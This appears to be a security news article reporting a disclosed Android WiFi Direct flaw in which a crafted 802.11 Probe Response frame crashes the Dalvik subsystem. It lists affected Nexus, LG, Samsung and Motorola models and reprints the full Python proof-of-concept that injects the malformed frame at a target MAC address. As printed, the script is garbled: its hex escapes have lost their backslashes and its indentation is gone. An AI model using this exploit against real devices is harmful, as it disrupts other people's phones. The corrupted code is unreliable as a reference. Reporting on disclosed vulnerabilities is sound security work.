Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs

An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.

Vulnerable Packages include:

. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2

Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the POC example from seclist:

   This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "x50x00"  # Frame Control
frame += "x00x00"  # Duration
frame += destination
frame += source
frame += source
frame += "x00x00"  # Sequence Control
frame += "x00x00x00x00x00x00x00x00"  # Timestamp
frame += "x64x00"  # Beacon Interval
frame += "x30x04"  # Capabilities Information
# SSID IE
frame += "x00"
frame += "x07"
frame += "DIRECT-"
# Supported Rates
frame += "x01"
frame += "x08"
frame += "x8Cx12x98x24xB0x48x60x6C"
# DS Parameter Set
frame += "x03"
frame += "x01"
frame += struct.pack("B", channel)
# P2P
frame += "xDD"
frame += "x27"
frame += "x50x6Fx9A"
frame += "x09"
# P2P Capabilities
frame += "x02" # ID
frame += "x02x00" # Length
frame += "x21x00"
# P2P Device Info
frame += "x0D" # ID
frame += "x1Bx00" # Length
frame += source
frame += "x01x88"
frame += "x00x0Ax00x50xF2x04x00x05"
frame += "x00"
frame += "x10x11"
frame += "x00x06"
frame += "fafaxFAxFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print "  poc.py  "
print "Example:"
print "  poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
The following two tabs change content below.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Leave a Reply